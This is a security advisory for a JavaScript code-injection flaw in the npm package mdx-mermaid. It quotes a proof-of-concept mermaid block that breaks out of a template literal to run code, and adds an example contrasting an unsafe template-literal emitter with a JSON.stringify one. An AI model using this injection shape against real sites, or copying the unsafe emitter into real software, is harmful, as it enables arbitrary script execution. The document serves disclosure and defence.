GHSA-rvgm-35jw-q628

Source
https://github.com/advisories/GHSA-rvgm-35jw-q628
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-rvgm-35jw-q628/GHSA-rvgm-35jw-q628.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-rvgm-35jw-q628
Aliases
Related
Published
2022-08-31T22:26:11Z
Modified
2023-11-08T04:09:58.603883Z
Severity
  • 3.6 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N
Summary
Improper Control of Generation of Code ('Code Injection') in mdx-mermaid
Details

Impact

Arbitrary JavaScript injection

If any mermaid code block is modified to include the following code, the code inside will execute when the component is loaded by MDXjs:

```
` + (function () {
  // Put Javascript code here
  return ''
}()) + `
```

The block below shows a valid mermaid code block:

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block, but with the exploit added:

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```
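
Why a payload of this shape runs, shown as an added example that is not mdx-mermaid's own code: it assumes the chart text is pasted into a template literal in generated JavaScript, and contrasts that with emitting the text through `JSON.stringify`. The names `emitUnsafe`, `emitSafe`, `evaluate`, `render` and `probe` are hypothetical, and the inputs are constructed from the two blocks above with `alert()` replaced by a harmless flag.

```javascript
// Simplified model of a Markdown-to-JS transform; NOT mdx-mermaid's code.
// Assumption: the fenced chart text ends up inside a template literal.

// Unsafe: the raw text is pasted between backticks, so a backtick in the
// input ends the literal and whatever follows is parsed as JavaScript.
function emitUnsafe(chart) {
  return 'render(`' + chart + '`)';
}

// Hardened: JSON.stringify emits a quoted, fully escaped string literal,
// so the chart text can only ever be data.
function emitSafe(chart) {
  return 'render(' + JSON.stringify(chart) + ')';
}

// Run generated source as a loaded module would be run, and report what
// reached render() and whether injected code executed.
function evaluate(source) {
  const rendered = [];
  const probe = { called: false };
  new Function('render', 'probe', source)((text) => rendered.push(text), probe);
  return { rendered, injected: probe.called };
}

// Constructed inputs: the advisory's two blocks, with alert() replaced by
// a harmless flag so the result can be checked.
const BENIGN = 'graph TD;\n    A-->B;\n    A-->C;\n    B-->D;\n    C-->D;';
const PAYLOAD =
  "` + (function () {\n  probe.called = true\n  return ''\n}()) + `\n" + BENIGN;

function demo() {
  return {
    unsafeBenign: evaluate(emitUnsafe(BENIGN)),
    unsafePayload: evaluate(emitUnsafe(PAYLOAD)),
    safePayload: evaluate(emitSafe(PAYLOAD)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Escaping only the backtick would not be sufficient for text placed in a template literal, since `${…}` is also evaluated there.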

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

Database specific
{
    "nvd_published_at": "2022-08-29T18:15:00Z",
    "github_reviewed_at": "2022-08-31T22:26:11Z",
    "severity": "LOW",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}
References

Affected packages

npm / mdx-mermaid

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (Unknown introduced version / All previous versions are affected)
Fixed
1.3.0

npm / mdx-mermaid

Package

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0-rc1
Fixed
2.0.0-rc2

Affected versions

2.*

2.0.0-rc1